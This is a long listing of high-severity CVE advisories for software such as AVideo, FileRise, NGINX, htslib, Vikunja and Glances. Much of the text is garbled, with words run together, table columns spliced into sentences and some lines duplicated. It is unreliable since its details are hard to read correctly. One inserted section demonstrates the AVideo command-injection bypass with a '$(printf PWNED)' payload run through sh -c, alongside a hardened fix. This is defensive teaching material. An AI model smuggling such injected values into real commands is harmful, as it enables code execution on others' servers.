Details32811 parameterlike/mypath?foo=bartoPathisescapedinto/mypath%3Ffoo=bar.Subsequently,arulematching /mypathnolongermatchesandisbypassed.TheissuecanonlyleadtounintendedaccessifHeimdallis configuredwithan"allowall"defaultrule.Sincev0.16.0,Heimdallenforcessecuredefaultsandrefusestostart withsuchaconfigurationunlessthisenforcementisexplicitlydisabled,e.g.via--insecure-skip-secure-default-rule- enforcementorthebroader--insecureflag.Thisissuehasbeenfixedinversion0.17.11. 
FileRiseisaself-hostedwebfilemanager/WebDAVserver.Inversionspriorto3.9.0,ahardcodeddefault encryptionkey(defaultpleasechangethiskey)isusedforallcryptographicoperations—HMACtoken CVE- generation,AESconfigencryption,andsessiontokens—allowinganyunauthenticatedattackertoforgeupload More2026- tokensforarbitraryfileuploadtosharedfolders,andtodecryptadminconfigurationsecretsincludingOIDCclient 8.2 Details33072 secretsandSMTPpasswords.FileRiseusesasinglekey(PERSISTENTTOKENSKEY)forallcryptooperations.The defaultvaluedefaultpleasechangethiskeyishardcodedintwoplacesandusedunlessthedeployerexplicitly overridestheenvironmentvariable.Thisissueisfixedinversion3.9.0. MatrimonyWebsiteScriptM-PluscontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticated CVE- attackerstomanipulatedatabasequeriesbyinjectingSQLcodethroughvariousPOSTparameters.Attackerscan More2019- injectmaliciousSQLpayloadsintoparametersliketxtGender,religion,Fage,andcboCountryacross 8.2 Details25639 simplesearchresults.php,advsearchresults.php,specialcaseresults.php,locationalresults.php,and registration2.phptoextractsensitivedatabaseinformationorexecutearbitrarySQLcommands. OpenClawversionspriorto2026.2.19containapathtraversalvulnerabilityintheFeishumediadownloadflowCVE- whereuntrustedmediakeysareinterpolateddirectlyintotemporaryfilepathsinextensions/feishu/src/media.ts. More2026- 8.2 AnattackerwhocancontrolFeishumediakeyvaluesreturnedtotheclientcanusetraversalsegmentstoescape Details22171 os.tmpdir()andwritearbitraryfileswithintheOpenClawprocesspermissions. CVE- BufferOverflowvulnerabilityingiflibv.5.2.2allowsaremoteattackertocauseadenialofserviceviathe More2026- 8.2 EGifGCBToExtensionoverwritinganexistingGraphicControlExtensionblockwithoutvalidatingitsallocatedsize. 
CVE-2026-24063 (CVSSv3 8.2): When a plugin is installed using the Arturia Software Center (MacOS), it also installs an uninstall.sh bash script in a root owned path. This script is written to disk with the file permissions 777, meaning it is writable by any user. When uninstalling a plugin via the Arturia Software Center, the Privileged Helper gets instructed to execute this script. When the bash script is manipulated by an attacker, this scenario will lead to privilege escalation.

CVE-2019-25640 (CVSSv3 8.2): Inout Article Base CMS contains SQL injection vulnerabilities that allow unauthenticated attackers to manipulate database queries through the 'p' and 'u' parameters. Attackers can inject SQL code using XOR-based payloads in GET requests to portalLogin.php to extract sensitive database information or cause denial of service through time-based attacks.

CVE-2019-25642 (CVSSv3 8.2): Bootstrapy CMS contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through POST parameters. Attackers can inject SQL payloads into the thread_id parameter of forum-thread.php, the subject parameter of contact-submit.php, the post-id parameter of post-new-submit.php, and the thread-id parameter to extract sensitive database information or cause denial of service.

CVE-2019-25581 (CVSSv3 8.2): i-doit CMDB 1.12 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the objGroupID parameter. Attackers can send GET requests with crafted SQL payloads in the objGroupID parameter to extract sensitive database information including usernames, database names, and version details.
bareboxisabootloader.Inbareboxfromversion2016.03.0tobeforeversion2025.09.3andfromversion 2025.10.0tobeforeversion2026.03.1,whencreatingaFIT,mkimage(1)setsthehashed-nodespropertyoftheCVE- FITsignaturenodetolistwhichnodesoftheFITwerehashedaspartofthesigningprocessasthesewillneedto More2026- 8.2 beverifiedlateronbythebootloader.However,hashed-nodesitselfisnotpartofthehashandcanthereforebe Details33243 modifiedbyanattackertotrickthebootloaderintobootingdifferentimagesthanthosethathavebeenverified. Thisissuehasbeenpatchedinbareboxversions2025.09.3and2026.03.1.

DNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAMrecords, CVE-validationofthereferenceidfieldoccurredtoolate,allowingtwooutofboundsreadstooccurbeforetheinvalid More2026-datawasdetected.Thebugdoesallowtwovaluestobeleakedtothecaller,howeverasthefunctionreportsan 8.2 Details31965erroritmaybedifficulttoexploitthem.Itisalsopossiblethattheprogramwillcrashduetotryingtoaccess invalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. NetartmediaVlogSystemcontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE-manipulatedatabasequeriesbyinjectingSQLcodethroughtheemailparameter.AttackerscansendPOST More2019- 8.2requeststoindex.phpwithmaliciousemailvaluesintheforgottenpasswordmoduletoextractsensitivedatabase Details25641information. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenan CVE-applicationendpointthatrequiresauthenticationisdeclaredunderaspecificpath,alreadyconfiguredforaHealth More2026-Groupadditionalpath.ThisissueaffectsSpringBoot:from4.0before4.0.3,from3.5before3.5.11,from3.4 8.2 Details22731before3.4.15.ThisCVEissimilarbutnotequivalenttoCVE-2026-22733,astheconditionsforexploitand vulnerableversionsaredifferent. 
NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpdavmodulemodulethatmightallowan attackertotriggerabufferoverflowtotheNGINXworkerprocess;thisvulnerabilitymayresultinterminationof CVE-theNGINXworkerprocessormodificationofsourceordestinationfilenamesoutsidethedocumentroot.This More2026-issueaffectsNGINXOpenSourceandNGINXPluswhentheconfigurationfileusesDAVmoduleMOVEorCOPY 8.2 Details27654methods,prefixlocation(nonregularexpressionlocationconfiguration),andaliasdirectives.Theintegrityimpact isconstrainedbecausetheNGINXworkerprocessuserhaslowprivilegesanddoesnothaveaccesstotheentire system.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. CVE- More2026- 8.1vulnerabilityinOvathemeTripgoallowsPHPLocalFileInclusion.ThisissueaffectsTripgo:fromn/abefore1.5.6. Details27093 CVE- More2026-versionsonthe2.xseriesuptoandincluding2.41.0,animproperauthorizationissueintheMyPageprofile 8.1 Details32300updatefeaturemayallowmodificationofarbitraryuserinformation.Versions1.41.1and2.41.1containapatch. FileRiseisaself-hostedwebfilemanager/WebDAVserver.Fromversion1.0.1tobeforeversion3.10.0,the CVE-resumableIdentifierparameterintheResumable.jschunkeduploadhandler(UploadModel::handleUpload())is More2026-concatenateddirectlyintofilesystempathswithoutanysanitization.Anauthenticateduserwithupload 8.1 Details33329permissioncanexploitthistowritefilestoarbitrarydirectoriesontheserver,deletearbitrarydirectoriesviathe post-assemblycleanup,andprobefile/directoryexistence.Thisissuehasbeenpatchedinversion3.10.0. 
CVE-DeserializationofUntrustedDatavulnerabilityinBuddhaThemesColorFolio-FreelanceDesignerWordPress More2026-ThemeallowsObjectInjection.ThisissueaffectsColorFolio-FreelanceDesignerWordPressTheme:fromn/a 8.1 Details27096through1.3. AvulnerabilitywasidentifiedinYiTechnologyYIHomeCamera22.1.120171024151200.Thisimpactsan CVE-unknownfunctionofthefilehome/web/ipcofthecomponentHTTPFirmwareUpdateHandler.Themanipulation More2026-leadstoimproperverificationofcryptographicsignature.Theattackispossibletobecarriedoutremotely.The 8.1 Details4478complexityofanattackisratherhigh.Theexploitabilityissaidtobedifficult.Theexploitispubliclyavailableand mightbeused.Thevendorwascontactedearlyaboutthisdisclosurebutdidnotrespondinanyway. CVE-AuthenticationBypassUsinganAlternatePathorChannelvulnerabilityinThemepasteAdminSafetyGuardallows More 2026- 8.1PasswordRecoveryExploitation.ThisissueaffectsAdminSafetyGuard:fromn/athrough1.2.6. Details 25471 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theremindMe.json.php endpointpasses`$REQUEST['livescheduleid']throughmultiplefunctionswithoutsanitizationuntilitreaches CVE-Schedulercommands::getAllActiveOrToRepeat(),whichdirectlyconcatenatesitintoaSQLLIKEclause. MoreAlthoughintermediatefunctions(newLiveschedule(),getUsers_idOrCompany())applyintval()internally, 8.1 33651theydosoonlocalcopieswithinObjectYPT::getFromDb()`,leavingtheoriginaltaintedvariableunchanged.Any Details authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit 75d45780728294ededa1e3f842f95295d3e7d144containsapatch.

CVE- to8.0.0.2,themoduleACLfunctionAclMain::zhAclCheck()onlychecksforthepresenceofany"allow"(useror More group).Itneverchecksforexplicit"deny"(allowed=0).Asaresult,administratorscannotrevokeaccessbysetting 8.1 Details33302 auserorgroupto"deny";iftheuserisinagroupthathas"allow,"accessisgrantedregardlessofexplicitdenies. Version8.0.0.2fixestheissue.

CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnarbitraryfilereadvulnerabilitywasidentifiedinthePDFcreation 8.1 Details33301 functionwheretheformanswersareparsedasunescapedHTML,allowinganattackertoincludearbitraryimage filesfromtheserverinthegeneratedPDF.Version8.0.0.2fixestheissue.

CVE-2026-33482 (CVSSv3 8.1): … sanitizeFFmpegCommand() function in plugin/API/standAlone/functions.php is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (&&, ;, |, `, <, >). However, it fails to strip $() (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted sh -c context in execAsync(), an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server. Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contains a patch.

CVE-2026-22324 (CVSSv3 8.1): … vulnerability in ThemeREX Melania allows PHP Local File Inclusion. This issue affects Melania: from n/a through 2.5.0.

CVE-2026-32942 (CVSSv3 8.1): PJSIP is a free and open source multimedia communication library written in C. Versions 2.16 and below contain a heap use-after-free vulnerability in the ICE session that occurs when there are race conditions between session destruction and the callbacks. This issue has been fixed in version 2.17.
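The AVideo sanitizer entry (CVE-2026-33482) is the standard blocklist failure: six metacharacters are stripped, and the seventh construct a shell expands inside double quotes is missed. The Python below is an added example, not AVideo's code: `sanitize_blocklist` models the strip list the advisory gives, `run_through_sh_c` runs the sanitized string under `sh -c "..."` with printf standing in for ffmpeg to show the substitution actually executes, and `build_ffmpeg_argv` is the hardened pattern (allowlist each value, pass an argv list, no shell). The payload, SAFE_VALUE and the function names are assumptions made for the example.

```python
import re
import subprocess

# The strip list the advisory attributes to sanitizeFFmpegCommand(); $( ) is not on it.
STRIPPED_TOKENS = ("&&", ";", "|", "`", "<", ">")


def sanitize_blocklist(cmd: str) -> str:
    """Blocklist sanitizer modelled on the advisory: removes the listed metacharacters and
    nothing else, so $(...) survives untouched."""
    for token in STRIPPED_TOKENS:
        cmd = cmd.replace(token, "")
    return cmd


def still_shell_expandable(cmd: str) -> bool:
    """Anything a POSIX shell still expands inside double quotes: $(...), ${...}, backticks."""
    return re.search(r"\$\(|\$\{|`", cmd) is not None


SAFE_VALUE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def build_ffmpeg_argv(input_name: str, output_name: str) -> list:
    """Hardened form: allowlist each untrusted value and build an argv list that is handed to
    subprocess.run() without shell=True, so no metacharacter is ever interpreted."""
    for value in (input_name, output_name):
        if not SAFE_VALUE.match(value) or ".." in value:
            raise ValueError(f"rejected ffmpeg argument: {value!r}")
    return ["ffmpeg", "-i", input_name, "-c", "copy", output_name]


def run_through_sh_c(sanitized: str) -> str:
    """What a double-quoted 'sh -c' context does with the sanitized string. printf stands in
    for ffmpeg so the demonstration does not need ffmpeg installed."""
    out = subprocess.run(["sh", "-c", f'printf "%s" "{sanitized}"'],
                         capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    payload = "in;put|$(printf PWNED).mp4"
    cleaned = sanitize_blocklist(payload)           # input$(printf PWNED).mp4
    print(cleaned, still_shell_expandable(cleaned))
    print(run_through_sh_c(cleaned))                # inputPWNED.mp4: the $( ) ran
    print(build_ffmpeg_argv("input.mp4", "out.mp4"))
```

The detection side is cheap: grep the sanitized string for `$(`, `${` and a backtick before it reaches any shell, and treat a hit as a failed sanitizer rather than something to strip. The durable fix is to never let the string reach a shell at all.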
DataEaseisanopensourcedatavisualizationanalysistool.Versions2.10.19andbelowhaveinconsistentLocale handlingbetweentheJDBCURLvalidationlogicandtheH2JDBCengine'sinternalparsing.DataEaseuses String.toUpperCase()withoutspecifyinganexplicitLocale,causingitssecuritycheckstorelyontheJVM'sdefault CVE-runtimelocale,whileH2JDBCalwaysnormalizesURLsusingLocale.ENGLISH.InTurkishlocaleenvironments More2026-(tr_TR),Javaconvertsthelowercaseletteritoİ(dottedcapitalI)insteadofthestandardI,soamalicious 8.1 Details32939parameterlikeiNITbecomesİNITinDataEase'sfilter(bypassingitsblacklist)whileH2stillcorrectlyinterpretsitas INIT.ThisdiscrepancyallowsattackerstosmuggledangerousJDBCparameterspastDataEase'ssecurity validation,andtheissuehasbeenconfirmedasexploitableinrealDataEasedeploymentscenariosrunningunder affectedregionalsettings.Theissuehasbeenfixedinversion2.10.20.

CVE-2026-33649 (CVSSv3 8.1): … plugin/Permissions/setPermission.json.php endpoint accepts GET parameters for a state-changing operation that modifies user group permissions. The endpoint has no CSRF token validation, and the application explicitly sets session.cookie_samesite=None on session cookies. This allows an unauthenticated attacker to craft a page with HTML tags that, when visited by an admin, silently grant arbitrary permissions to the attacker's user group, escalating the attacker to near-admin access. As of time of publication, no known patched versions are available.

researchanddevelopmentinNaturalLanguageProcessing.Inversions3.9.3andprior,theNLTKdownloaderdoesCVE-notvalidatethesubdirandidattributeswhenprocessingremoteXMLindexfiles.Attackerscancontrola More2026- 8.1remoteXMLindexservertoprovidemaliciousvaluescontainingpathtraversalsequences(suchas../),which Details33236canleadtoarbitrarydirectorycreation,arbitraryfilecreation,andarbitraryfileoverwrite.Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8apatchestheissue. Daguisaworkflowenginewithabuilt-inWebuserinterface.Fromversion2.0.0tobeforeversion2.3.1,thefixfor CVE-CVE-2026-27598addedValidateDAGNametoCreateNewDAGandrewrotegenerateFilePathtousefilepath.Base. More2026-ThispatchedtheCREATEpath.TheremainingAPIendpoints-GET,DELETE,RENAME,EXECUTE-allpassthe 8.1 Details33344{fileName}URLpathparametertolocateDAGwithoutcallingValidateDAGName.%2F-encodedforwardslashesin the{fileName}segmenttraverseoutsidetheDAGsdirectory.Thisissuehasbeenpatchedinversion2.3.1. MuraCMSthrough10.1.10containsaCSRFvulnerabilitythatallowsattackerstopermanentlydestroyalldeleted contentstoredinthetrashsystemthroughasimpleCSRFattack.ThevulnerablecTrash.emptyfunctionlacks CSRFtokenvalidation,enablingmaliciouswebsitestoforgerequeststhatirreversiblydeletealltrashedcontentCVE- Morewhenanauthenticatedadministratorvisitsacratedwebpage.SuccessfulexploitationoftheCSRFvulnerability2025- 8.1 DetailsresultsinpotentiallycatastrophicdatalosswithintheMuraCMSsystem.Whenanauthenticatedadministrator55046 visitsamaliciouspagecontainingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthat permanentlyemptiestheentiretrashsystemwithoutanyvalidation,confirmationdialog,oruserconsent. 
WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thedeleteDumpparameterin CVE-plugin/CloneSite/cloneServer.json.phpispasseddirectlytounlink()withoutanypathsanitization.Anattacker Morewithvalidclonecredentialscanusepathtraversalsequences(e.g.,../../)todeletearbitraryfilesontheserver, 8.1 Details33293includingcriticalapplicationfilessuchasconfiguration.php,causingcompletedenialofserviceorenabling furtherattacksbyremovingsecurity-criticalfiles.Version26.0fixestheissue.

WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theofficialDockerdeploymentfiles (docker-compose.yml,env.example)shipwiththeadminpasswordsetto"password",whichisautomaticallyused toseedtheadminaccountduringinstallation,meaninganyinstancedeployedwithoutoverriding SYSTEMADMINPASSWORDisimmediatelyvulnerabletotrivialadministrativetakeover.NocompensatingCVE-controlsexist:thereisnoforcedpasswordchangeonfirstlogin,nocomplexityvalidation,nodefault-password More 8.1detection,andthepasswordishashedwithweakMD5.Fulladminaccessenablesuserdataexposure,content Details33037manipulation,andpotentialremotecodeexecutionviafileuploadsandpluginmanagement.Thesameinsecure- defaultpatternextendstodatabasecredentials(avideo/avideo),compoundingtherisk.Exploitationdependson operatorsfailingtochangethedefault,aconditionlikelymetinquick-start,demo,andautomateddeployments. Thisissuehasbeenfixedinversion26.0. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,/objects/phpsessionid.json.phpCVE-exposesthecurrentPHPsessionIDtoanyunauthenticatedrequest.TheallowOrigin()functionreflectsanyOrigin More2026- 8.1headerbackinAccess-Control-Allow-OriginwithAccess-Control-Allow-Credentials:true,enablingcross-origin Details33043sessiontheftandfullaccounttakeover.Thisissuehasbeenfixedinversion26.0. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfileswithina specifieddirectory.Inversions2.61.2andbelow,theTUSresumableuploadhandlerparsestheUpload-Length headerasasigned64-bitintegerwithoutvalidatingthatthevalueisnon-negative,allowinganauthenticateduser tosupplyanegativevaluethatinstantlysatisfiestheuploadcompletionconditionuponthefirstPATCHrequest. 
Thiscausestheservertofireafter_uploadexechookswithemptyorpartialfiles,enablinganattackertoCVE-repeatedlytriggeranyconfiguredhookwitharbitraryfilenamesandzerobyteswritten.Theimpactrangesfrom More2026- 8.1DoSthroughexpensiveprocessinghooks,tocommandinjectionamplificationwhencombinedwithmalicious Details32759filenames,toabuseofupload-drivenworkflowslikeS3ingestionordatabaseinserts.Evenwithoutexechooks enabled,thenegativeUpload-Lengthcreatesinconsistentcacheentrieswherefilesaremarkedcompletebut containnodata.AlldeploymentsusingtheTUSuploadendpoint(/api/tus)areaffected,withtheenableExecflag escalatingtheimpactfromcacheinconsistencytoremotecommandexecution.Atthetimeofpublication,no patchormitigationwasavailabletoaddressthisissue. Checkmateisanopen-source,self-hostedtooldesignedtotrackandmonitorserverhardware,uptime,response times,andincidentsinreal-timewithbeautifulvisualizations.Inversionsfrom3.5.1andprior,amassassignmentCVE-vulnerabilityinCheckmate'suserprofileupdateendpointallowsanyauthenticatedusertoescalatetheir More2026- 8.1privilegestosuperadmin,bypassingallrole-basedaccesscontrols.Anattackercanmodifytheiruserroletogain Details31836completeadministrativeaccesstotheapplication,includingtheabilitytoviewallusers,modifycritical configurations,andaccesssensitivesystemdata.Attimeofpublication,therearenopubliclyavailablepatches. 
tar-rsisatararchivereading/writinglibraryforRust.Versions0.4.44andbelowhaveconditionallogicthatskips thePAXsizeheaderincaseswherethebaseheadersizeisnonzero.AspartofCVE-2025-62518,theastral-tokio- tarprojectwaschangedtocorrectlyhonorPAXsizeheadersinthecasewhereitwasdifferentfromthebaseCVE-header.Thisisalmosttheinverseoftheastral-tokio-tarissue.Anydiscrepancyinhowtarparsershonorfilesize More2026- 8.1canbeusedtocreatearchivesthatappeardifferentlywhenunpackedbydifferentarchivers.Inthiscase,thetar- Details33055rs(Rusttar)crateisanoutlierincheckingfortheheadersize-othertarparsers(includinge.g.Goarchive/tar) unconditionallyusethePAXsizeoverride.Thiscanaffectanythingthatusesthetarcratetoparsearchivesand expectstohaveaconsistentviewwithotherparsers.Thisissuehasbeenfixedinversion0.4.45. WWBNAVideoisanopensourcevideoplatform.Versions25.0andbelowarevulnerabletounauthenticated applicationtakeoverthroughtheinstall/checkConfiguration.phpendpoint.install/checkConfiguration.phpperformsCVE-fullapplicationinitialization:databasesetup,adminaccountcreation,andconfigurationfilewrite,allfroman More2026- 8.1unauthenticatedPOSTinput.Theonlyguardischeckingwhethervideos/configuration.phpalreadyexists.On Details33038uninitializeddeployments,anyremoteattackercancompletetheinstallationwithattacker-controlledcredentials andanattacker-controlleddatabase,gainingfulladministrativeaccess.Thisissuehasbeenfixedinversion26.0. CVE-Priortoversions7.15.1and8.9.3,theSuiteCRMRESTAPIV8hasmissingACL(AccessControlList)checkson More2026- 8.1severalendpoints,allowingauthenticateduserstoaccessandmanipulatedatatheyshouldnothavepermission Details29189tointeractwith.Versions7.15.1and8.9.3patchtheissue.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_LENmethod,thecram_byte_array_len_decode()failedtovalidatethatthe amountofdatabeingunpackedmatchedthesizeoftheoutputbufferwhereitwastobestored.DependingonCVE-thedataseriesbeingread,thiscouldresulteitherinaheaporastackoverflowwithattacker-controlledbytes. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31971opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.0,aflawinVikunja’s passwordresetlogicallowsdisableduserstoregainaccesstotheiraccounts.TheResetPassword()functionsetsCVE-theuser’sstatustoStatusActiveafterasuccessfulpasswordresetwithoutverifyingwhethertheaccountwas More 8.1previouslydisabled.Byrequestingaresettokenthrough/api/v1/user/password/tokenandcompletingthereset Details33316 via/api/v1/user/password/reset,adisabledusercanreactivatetheiraccountandbypassadministrator-imposed accountdisablement.Version2.2.0patchestheissue. accountdisablement.Version2.2.0patchestheissue. 
CVE-2026-27625 (CVSSv3 8.1): Stirling-PDF is a locally hosted web application that performs various operations on PDF files. In versions prior to 2.5.2, the /api/v1/convert/markdown/pdf endpoint extracts user-supplied ZIP entries without path checks. Any authenticated user can write files outside the intended temporary working directory, leading to arbitrary file write with the privileges of the Stirling-PDF process user (stirlingpdfuser). This can overwrite writable files and compromise data integrity, with further impact depending on writable paths. The issue was fixed in version 2.5.2.

CVE-2026-33678 (CVSSv3 8.1): Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, TaskAttachment.ReadOne() queries attachments by ID only (WHERE id = ?), ignoring the task ID from the URL path. The permission check in CanRead() validates access to the task specified in the URL, but ReadOne() loads a different attachment that may belong to a task in another project. This allows any authenticated user to download or delete any attachment in the system by providing their own accessible task ID with a target attachment ID. Attachment IDs are sequential integers, making enumeration trivial. Version 2.2.1 patches the issue.

DNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference-based compressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocationinan externalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasasequenceofCVE-"features".Whendecodingthesefeatures,anout-by-oneerrorinatestforCRAMfeaturesthatappearbeyondthe More2026- 8.1extentoftheCRAMrecordsequencecouldresultinaninvalidwriteofoneattacker-controlledbytebeyondthe Details31963endofaheapbuffer.Exploitingthisbugcausesaheapbufferoverflow.Ifauseropensafilecraftedtoexploitthis issue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheapstructuresinwaysnotexpectedby theprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1 includefixesforthisissue.Thereisnoworkaroundforthisissue. ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion4.28.0,thebearertoken authenticationmiddlewarein@apostrophecms/express/index.js(lines386-389)containsanincorrectMongoDBCVE-querythatallowsincompletelogintokens—wherethepasswordwasverifiedbutTOTP/MFArequirementswere More2026- 8.1NOT—tobeusedasfullyauthenticatedbearertokens.Thiscompletelybypassesmulti-factorauthenticationfor Details32730anyApostropheCMSdeploymentusing@apostrophecms/login-totporanycustomafterPasswordVerifiedlogin requirement.Version4.28.0fixestheissue. 
pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Versionsbefore0.5.0b3.dev97are CVE-vulnerabletopathtraversalduringpasswordverificationofcertainencrypted7zarchives(encryptedfileswith More2026-non-encryptedheaders),causingarbitraryfiledeletionoutsideoftheextractiondirectory.Duringpassword 8.1 Details32808verification,pyLoadderivesanarchiveentrynamefrom7zlistingoutputandtreatsitasafilesystempathwithout constrainingittotheextractiondirectory.Thisissuehasbeenfixedinversion0.5.0b3.dev97. CVE-ImpropercertificatevalidationinthePAMpropagationWinRMconnectionsallowsanetworkattackertoperforma More2026- 8.1man-in-the-middleattackviadisabledTLScertificateverification. Details4434 AflawwasfoundinKeycloak.AremoteattackercouldbypasssecuritycontrolsbysendingavalidSAMLresponseCVE-fromanexternalIdentityProvider(IdP)totheKeycloakSAMLendpointforIdP-initiatedbrokerlogins.Thisallows More2026- 8.1theattackertocompletebrokerloginsevenwhentheSAMLIdentityProviderisdisabled,leadingtounauthorized Details2603authentication.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.FortheVARINTand CONSTencodings,incompletevalidationofthecontextinwhichtheencodingswereusedcouldresultinupto eightbytesbeingwrittenbeyondtheendofaheapallocation,oruptoeightbytesbeingwrittentothelocationofCVE-aonebytevariableonthestack,possiblycausingthevaluestoadjacentvariablestochangeunexpectedly. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31968opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_STOPmethod,anout-by-oneerrorinthe CVE-cram_byte_array_stop_decode_char()functioncheckforafulloutputbuffercouldresultinasingleattacker- More2026-controlledbytebeingwrittenbeyondtheendofaheapallocation.Exploitingthisbugcausesaheapbuffer 8.1 Details31969overflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingof dataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrary codeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowsermode, GlancesstoresboththeZeroconf-advertisedservernameandthediscoveredIPaddressfordynamicservers,but laterbuildsconnectionURIsfromtheuntrustedadvertisednameinsteadofthediscoveredIP.Whenadynamic serverreportsitselfasprotected,Glancesalsousesthatsameuntrustednameasthelookupkeyforsaved MoreCVE- 8.1passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details fakeGlancesserviceoverZeroconfandcausethebrowsertoautomaticallysendareusableGlances32634 authenticationsecrettoanattacker-controlledhost.ThisaffectsthebackgroundpollingpathandtheREST/WebUI click-throughpathinCentralBrowsermode.Version4.5.2fixestheissue. 
jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontrolofargumentsofthe createAnnotationmethodallowsuserstoinjectarbitraryPDFobjects,suchasJavaScriptactions.IfgiventheCVE-possibilitytopassunsanitizedinputtothefollowingmethod,ausercaninjectarbitraryPDFobjects,suchas More2026- 8.1JavaScriptactions,whichmighttriggerwhenthePDFisopenedorinteractedwiththecreateAnnotation:color Details31898parameter.ThevulnerabilityhasbeenfixedinjsPDF@4.2.1.Asaworkaround,sanitizeuserinputbeforepassingit tothevulnerableAPImembers. mcp-memory-serviceisanopen-sourcememorybackendformulti-agentsystems.Priortoversion10.25.1,when theHTTPserverisenabled(MCPHTTPENABLED=true),theapplicationconfiguresFastAPI'sCORSMiddlewarewith CVE-alloworigins=['*'],allowcredentials=True,allowmethods=["*"],andallowheaders=[""].ThewildcardAccess- More2026-Control-Allow-Origin:headerpermitsanywebsitetoreadAPIresponsescross-origin.Whencombinedwith 8.1 Details33010anonymousaccess(MCPALLOWANONYMOUS_ACCESS=true)-thesimplestwaytogettheHTTPdashboard workingwithoutOAuth-nocredentialsareneeded,soanymaliciouswebsitecansilentlyread,modify,anddelete allstoredmemories.Thisissuehasbeenpatchedinversion10.25.1.

Priortoversions7.15.1and8.9.3,whencreatingoreditingareport(AORReportsmodule),the`fieldfunctionCVE-parameterfromPOSTdataissaveddirectlyintotheaorfieldstablewithoutanyvalidation.Later,whenthe More2026-reportisexecuted/viewed,thisvalueisconcatenateddirectlyintoaSQLSELECTquerywithoutsanitization, 8.1 Details29096enablingsecond-orderSQLinjection.AnyauthenticateduserwithReportsaccesscanextractarbitrarydatabase contents(passwordhashes,APItokens,configvalues).OnMySQLwithFILEprivilege,thiscouldleadtoRCEvia SELECTINTOOUTFILE.Versions7.15.1and8.9.3patchtheissue. TheInvelityProductFeedspluginforWordPressisvulnerabletoarbitraryfiledeletionviapathtraversalinall CVE-versionsupto,andincluding,1.2.6.Thisisduetomissingvalidationandsanitizationinthe More2025-'createManageFeedPage'function.Thismakesitpossibleforauthenticatedadministrator-levelattackerstodelete 8.1 Details14037arbitraryfilesontheserverviaspeciallycraftedrequeststhatincludepathtraversalsequences,grantedtheycan trickanadminintoclickingamaliciouslink. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,theGlancesRESTAPIweb servershipswithadefaultCORSconfigurationthatsetsalloworigins=[""]combinedwithallow_credentials=True.Whenbothoftheseoptionsareenabledtogether,Starlette'sCORSMiddlewareCVE-reflectstherequestingOriginheadervalueintheAccess-Control-Allow-Originresponseheaderinsteadof More2026- 